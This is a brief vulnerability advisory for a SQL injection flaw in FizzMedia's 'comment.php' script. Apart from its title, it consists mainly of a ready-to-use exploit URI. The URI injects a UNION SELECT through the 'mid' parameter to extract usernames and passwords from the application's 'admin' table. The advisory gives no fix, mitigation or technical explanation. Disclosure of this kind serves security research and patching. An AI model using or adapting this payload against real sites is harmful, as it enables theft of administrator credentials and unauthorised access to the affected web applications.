FizzMedia 'comment.php' SQL Injection Vulnerability

FizzMedia 'comment.php' SQL Injection Vulnerability

An attacker can exploit this issue via a browser.

The following example URI is available:

http://www.example.com/comment.php?mid=-1'+UNION+SELECT+0,0,0,Concat_Ws(0x3a3a,user,pass)MrSQL,0,0,0,0,0,0,0,0,0+FROM+admin/*